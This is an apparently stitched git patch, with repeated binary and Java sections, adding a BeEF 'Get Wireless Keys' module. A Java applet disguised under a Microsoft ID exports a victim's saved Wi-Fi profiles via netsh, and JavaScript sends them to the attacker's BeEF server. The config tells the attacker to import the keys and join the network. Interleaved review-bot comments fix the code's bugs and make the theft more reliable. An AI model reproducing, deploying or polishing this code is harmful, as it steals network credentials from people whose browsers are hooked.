diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class new file mode 100644 index 0000000000000000000000000000000000000000..cb5a0838e11cb355019ff1b9bc333bc4d5c053cb GIT binary patch literal 2818 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 VMyif9G>p``Ks{gtRZ$w6{{Ulji_`!B literal 0 HcmV?d00001 
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java new file mode 100644 index 000000000..e0c349785 --- /dev/null +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java 
@@ -0,0 +1,113 @@ +import java.io.*; +import java.util.*; +import java.net.*; +import java.applet.*; + +// Keith Lee +// Twitter: @keith55 +// http://milo2012.wordpress.com +// keith.lee2012[at]gmail.com + +public class wirelessZeroConfig extends Applet{ + public static String result = ""; + + public wirelessZeroConfig(){ + super(); + return; + } + public static String getInfo() { + return result; + } + + public void init() { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + } + + public static String getWindows(){ + String cmd1 = "netsh wlan show profiles"; + String cmd2 = "netsh wlan export profile name="; + String keyword1 = "User profiles"; + String wlanProfileArr[]; + String wlanProfileName; + int match = 0; + int count = 0; + ArrayList profileList = new ArrayList(); + try { + //Get wlan profile names + Process p1 = Runtime.getRuntime().exec(cmd1); + BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream())); + String line = null; + //Checks if string match "User profiles" + while ((line = in1.readLine()) != null) { + //Checks if string match "User profiles" + if(match==0){ + if(line.toLowerCase().contains(keyword1.toLowerCase())){ + match=1; + } + } + if(match==1){ + if(count>1){ + //If string matches the keyword "User Profiles" + line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", "")); + if(line.length()>0){ + wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");; + profileList.add(wlanProfileName); + } + } + count+=1; + } + } + in1.close(); + } catch (IOException e) { } + + try{ + //Export WLAN Profile to XML file + for(Iterator iterator = profileList.iterator(); iterator.hasNext();){ + String profileName = iterator.next().toString(); + Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"'); + //Check if exported xml exists + 
File f = new File("Wireless Network Connection-"+profileName+".xml"); + if(f.exists()){ + //Read contents of XML file into results variable + FileInputStream fstream = new FileInputStream(f); + DataInputStream in2 = new DataInputStream(fstream); + BufferedReader br = new BufferedReader(new InputStreamReader(in2)); + String xmlToStr; + while((xmlToStr = br.readLine()) != null){ + result+=xmlToStr; + } + in2.close(); + } + } + } catch (IOException e) { + } + return result; + } + + public static boolean isWindows() { + String os = System.getProperty("os.name").toLowerCase(); + return (os.indexOf("win") >= 0); + } + + /** + public static void main(String[] args) { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + System.out.println(osVersion); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + System.out.println(result); + } + **/ +} From 5cb1ad3d534d40ee3e460959d01df8a4c4ef8a40 Mon Sep 17 00:00:00 2001 From: milo2012 Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 9/9] Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems --- modules/host/get_wireless_keys/command.js | 30 +++++ modules/host/get_wireless_keys/config.yaml | 26 ++++ modules/host/get_wireless_keys/module.rb | 35 ++++++ .../wirelessZeroConfig.class | Bin 0 -> 2818 bytes .../get_wireless_keys/wirelessZeroConfig.jar | Bin 0 -> 3285 bytes .../get_wireless_keys/wirelessZeroConfig.java | 113 ++++++++++++++++++ 6 files changed, 204 insertions(+) create mode 100644 modules/host/get_wireless_keys/command.js create mode 100644 modules/host/get_wireless_keys/config.yaml create mode 100644 modules/host/get_wireless_keys/module.rb create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.class create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.jar create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.java 
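Review bot: Both `catch (IOException e) { }` blocks in `getWindows` are empty, so a failed `exec`, a missing file or a read error is indistinguishable from an empty result; either let the `IOException` propagate to `init`, or add a comment such as `// failures are deliberately silent: the applet returns whatever was collected` if that is the intent. The `FileInputStream`/`DataInputStream`/`BufferedReader` chain is closed only on the success path, so an exception inside the read loop leaks the stream — wrap it in `try (BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(f)))) { ... }` if the target JRE level allows, or close in `finally`; the `DataInputStream` wrapper adds nothing. Lesser points: `ArrayList` and `Iterator` are raw types (`ArrayList<String> profileList`, `for (String profileName : profileList)`), `String wlanProfileArr[];` is unused, there is a stray `;;` after the `wlanProfileName` assignment, and the commented-out `main` at the bottom should be deleted.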
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null +++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml 
@@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + 
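Review bot: `f.write((@datastore['results']).sub("result=",""))` reads the key `results`, while the line above (`@datastore['result'].to_s`) and the `'result='` prefix sent from `command.js` use `result`; unless the datastore carries both keys this is `nil.sub` and `post_execute` raises before `save_result` runs. The handle from `File.open("exported_wlan_profiles.xml","w+")` is never closed; the block form closes it and fixes the key in one line, `File.open("exported_wlan_profiles.xml", "w") { |f| f.write(@datastore['result'].to_s.sub("result=", "")) }`. The `unbind('/wirelessZeroConfig.jar')` path also differs from the `'/wirelessZeroConfig'` passed to `bind` in `pre_send`; whether the handler appends the `'jar'` extension itself is not visible here, so confirm the two refer to the same route.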
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class new file mode 100644 index 0000000000000000000000000000000000000000..cb5a0838e11cb355019ff1b9bc333bc4d5c053cb GIT binary patch literal 2818 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 VMyif9G>p``Ks{gtRZ$w6{{Ulji_`!B literal 0 HcmV?d00001 
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java new file mode 100644 index 000000000..e0c349785 --- /dev/null +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java 
@@ -0,0 +1,113 @@
+import java.io.*;
+import java.util.*;
+import java.net.*;
+import java.applet.*;
+
+// Keith Lee
+// Twitter: @keith55
+// http://milo2012.wordpress.com
+// keith.lee2012[at]gmail.com
+
+public class wirelessZeroConfig extends Applet{
+ public static String result = "";
+
+ public wirelessZeroConfig(){
+ super();
+ return;
+ }
+ public static String getInfo() {
+ return result;
+ }
+
+ public void init() {
+ if (isWindows()) {
+ String osVersion= System.getProperty("os.version");
+ if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+ result=getWindows();
+ }
+ } else {
+ result = "OS is not supported";
+ }
+ }
+
+ public static String getWindows(){
+ String cmd1 = "netsh wlan show profiles";
+ String cmd2 = "netsh wlan export profile name=";
+ String keyword1 = "User profiles";
+ String wlanProfileArr[];
+ String wlanProfileName;
+ int match = 0;
+ int count = 0;
+ ArrayList profileList = new ArrayList();
+ try {
+ //Get wlan profile names
+ Process p1 = Runtime.getRuntime().exec(cmd1);
+ BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));
+ String line = null;
+ //Checks if string match "User profiles"
+ while ((line = in1.readLine()) != null) {
+ //Checks if string match "User profiles"
+ if(match==0){
+ if(line.toLowerCase().contains(keyword1.toLowerCase())){
+ match=1;
+ }
+ }
+ if(match==1){
+ if(count>1){
+ //If string matches the keyword "User Profiles"
+ line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
+ if(line.length()>0){
+ wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
+ profileList.add(wlanProfileName);
+ }
+ }
+ count+=1;
+ }
+ }
+ in1.close();
+ } catch (IOException e) { }
+
+ try{
+ //Export WLAN Profile to XML file
+ for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
+ String profileName = iterator.next().toString();
+ Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');
+ //Check if exported xml exists
+
File f = new File("Wireless Network Connection-"+profileName+".xml");
+ if(f.exists()){
+ //Read contents of XML file into results variable
+ FileInputStream fstream = new FileInputStream(f);
+ DataInputStream in2 = new DataInputStream(fstream);
+ BufferedReader br = new BufferedReader(new InputStreamReader(in2));
+ String xmlToStr;
+ while((xmlToStr = br.readLine()) != null){
+ result+=xmlToStr;
+ }
+ in2.close();
+ }
+ }
+ } catch (IOException e) {
+ }
+ return result;
+ }
+
+ public static boolean isWindows() {
+ String os = System.getProperty("os.name").toLowerCase();
+ return (os.indexOf("win") >= 0);
+ }
+
+ /**
+ public static void main(String[] args) {
+ if (isWindows()) {
+ String osVersion= System.getProperty("os.version");
+ System.out.println(osVersion);
+ if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+ result=getWindows();
+ }
+ } else {
+ result = "OS is not supported";
+ }
+ System.out.println(result);
+ }
+ **/
+}
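Review bot: Both `catch (IOException e) { }` blocks in `getWindows` discard the failure, so an error from the `netsh` call or the file read leaves `result` empty with nothing to diagnose; at minimum record it, e.g. `result += "error: " + e;`. The readers are closed only on the success path (`in1.close()` and `in2.close()` sit inside the `try`), and the `DataInputStream` wrapper adds nothing; the file-read loop rewritten with try-with-resources is below, and the same applies to `in1`. `getWindows` appends into the static `result` rather than a local, so a second `init()` concatenates onto the previous output, and `line.split(":")[1]` throws an unchecked `ArrayIndexOutOfBoundsException`, which the `IOException` handler does not catch, for any line in that section without a colon. `ArrayList`/`Iterator` are raw types and `wlanProfileArr` is never used; `ArrayList<String>` with an enhanced `for` also removes the `toString()` call.
```java
// … unchanged: profile enumeration and the netsh export call …
File f = new File("Wireless Network Connection-" + profileName + ".xml");
if (f.exists()) {
    // Read the exported XML into result; the reader is closed on every path, not only on success
    try (BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(f)))) {
        String xmlToStr;
        while ((xmlToStr = br.readLine()) != null) {
            result += xmlToStr;
        }
    }
}
```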